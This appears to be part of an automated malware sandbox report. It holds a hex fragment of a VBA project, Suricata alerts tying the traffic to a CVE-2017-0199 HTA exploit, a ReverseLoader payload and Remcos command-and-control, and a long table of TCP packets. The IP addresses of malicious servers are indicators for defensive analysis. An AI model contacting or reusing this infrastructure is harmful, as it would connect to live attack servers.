                                                                                                                                                                                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4f ac 56 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                                                Network Behavior

                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                2024-11-25T14:06:33.524346+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1172.234.205.13580192.168.2.2249177TCP
                                                                                                                                                                                2024-11-25T14:06:33.524346+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1172.234.205.13580192.168.2.2249177TCP
                                                                                                                                                                                2024-11-25T14:06:33.524346+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1172.234.205.13580192.168.2.2249173TCP
                                                                                                                                                                                2024-11-25T14:06:33.524346+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1172.234.205.13580192.168.2.2249173TCP
                                                                                                                                                                                2024-11-25T14:06:37.319515+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249162172.234.205.13580TCP
                                                                                                                                                                                2024-11-25T14:06:37.319565+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1172.234.205.13580192.168.2.2249162TCP
                                                                                                                                                                                2024-11-25T14:06:41.846744+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164172.234.205.13580TCP
                                                                                                                                                                                2024-11-25T14:06:41.971767+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1172.234.205.13580192.168.2.2249164TCP
                                                                                                                                                                                2024-11-25T14:06:49.776281+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249165172.234.205.13580TCP
                                                                                                                                                                                2024-11-25T14:07:02.412468+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249171172.234.205.13580TCP
                                                                                                                                                                                2024-11-25T14:07:05.115920+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21193.30.119.205443192.168.2.2249168TCP
                                                                                                                                                                                2024-11-25T14:07:20.951958+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21193.30.119.205443192.168.2.2249172TCP
                                                                                                                                                                                2024-11-25T14:07:21.342228+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11172.234.205.13580192.168.2.2249173TCP
                                                                                                                                                                                2024-11-25T14:07:21.342228+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21172.234.205.13580192.168.2.2249173TCP
                                                                                                                                                                                2024-11-25T14:07:24.964712+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917431.13.224.722412TCP
                                                                                                                                                                                2024-11-25T14:07:27.766398+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917531.13.224.722412TCP
                                                                                                                                                                                2024-11-25T14:07:28.439430+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249176178.237.33.5080TCP
                                                                                                                                                                                2024-11-25T14:07:35.806679+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11172.234.205.13580192.168.2.2249177TCP
                                                                                                                                                                                2024-11-25T14:07:35.806679+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21172.234.205.13580192.168.2.2249177TCP

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Nov 25, 2024 14:06:33.889245987 CET49161443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:33.889286041 CET44349161198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:33.889386892 CET49161443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:33.970231056 CET49161443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:33.970271111 CET44349161198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:35.400301933 CET44349161198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:35.400459051 CET49161443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:35.413059950 CET49161443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:35.413075924 CET44349161198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:35.413502932 CET44349161198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:35.413585901 CET49161443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:35.555263042 CET49161443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:35.599334002 CET44349161198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:35.955926895 CET44349161198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:35.956005096 CET49161443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:35.956007957 CET44349161198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:35.956056118 CET49161443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:35.957504988 CET49161443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:35.957520962 CET44349161198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:35.969450951 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:36.093046904 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:36.093177080 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:36.130765915 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:36.251562119 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319276094 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319375038 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319389105 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319423914 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319442987 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319514990 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.319565058 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319580078 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319595098 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319600105 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.319612026 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319614887 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.319628000 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.319631100 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.319653034 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.319674969 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.340158939 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.439981937 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.440052032 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.440112114 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.440187931 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.444005966 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.444058895 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.537935972 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.537950039 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.538003922 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.540024042 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.540076971 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.540106058 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.540149927 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.548542976 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.548602104 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.548773050 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.548820972 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.556880951 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.556936026 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.557010889 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.557065010 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.565562010 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.565642118 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.566454887 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.566508055 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.574582100 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.574650049 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.574656010 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.574700117 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.582415104 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.582482100 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.582523108 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.582570076 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.590538025 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.590615034 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.590619087 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.590655088 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.598931074 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.598992109 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.599086046 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.599128962 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.607351065 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.607414961 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.607451916 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.607495070 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.615763903 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.615825891 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.615859985 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.615906000 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.624702930 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.624783039 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.749305010 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.749351978 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.749433041 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.751199961 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.751276016 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.751291990 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.751338959 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.756582975 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.756642103 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.756764889 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.756813049 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.762059927 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.762156963 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.762177944 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.762214899 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.767518044 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.767589092 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.767623901 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.767667055 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.773166895 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.773225069 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.773361921 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.773401976 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.778403997 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.778470039 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.778506041 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.778541088 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.783780098 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.783814907 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.784013033 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.784060955 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.784128904 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.784164906 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.789367914 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.789426088 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.789474964 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.789520979 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.795001030 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.795073986 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.795099974 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.795164108 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.800339937 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.800405979 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.800442934 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.800482035 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.805840969 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.805901051 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.805905104 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.805944920 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.811882019 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.811947107 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.811949015 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.811992884 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.816668034 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.816740036 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.816777945 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.816818953 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.822170019 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.822252989 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.822266102 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.822309971 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.827682972 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.827743053 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.827817917 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.827862978 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.833518028 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.833569050 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.833600044 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.833623886 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:38.415986061 CET49163443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:38.416030884 CET44349163198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:38.416101933 CET49163443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:38.451375008 CET49163443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:38.451400042 CET44349163198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:39.928999901 CET44349163198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:39.929060936 CET49163443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:39.938175917 CET49163443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:39.938199997 CET44349163198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:39.938524961 CET44349163198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:39.938683987 CET49163443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:40.026407957 CET49163443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:40.071336031 CET44349163198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:40.470489025 CET44349163198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:40.470571041 CET44349163198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:40.470619917 CET49163443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:40.470649958 CET49163443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:40.472259998 CET49163443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:40.472280979 CET44349163198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:40.481903076 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:40.602828026 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:40.602910042 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:40.603158951 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:40.723125935 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846602917 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846631050 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846645117 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846657038 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846669912 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846681118 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846693039 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846710920 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846723080 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846736908 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.846744061 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:41.846760035 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:41.846767902 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:41.853077888 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:41.971766949 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.971844912 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:41.971899033 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.971952915 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:41.975857973 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:41.975915909 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.085577965 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.085596085 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.085630894 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.085653067 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.089384079 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.089428902 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.089517117 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.089564085 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.097949028 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.097970009 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.098026991 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.106379032 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.106447935 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.106477022 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.106517076 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.114815950 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.114881992 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.114912033 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.114955902 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.123234987 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.123337030 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.123352051 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.123394966 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.131696939 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.131772041 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.131792068 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.131833076 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.140196085 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.140250921 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.140288115 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.140299082 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.148655891 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.148726940 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.148773909 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.148813009 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.157232046 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.157315969 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.157341957 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.157406092 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.165535927 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.165601015 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.165627956 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.165668011 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.205818892 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.205852032 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.205882072 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.205899000 CET4916480192.168.2.22172.234.205.135
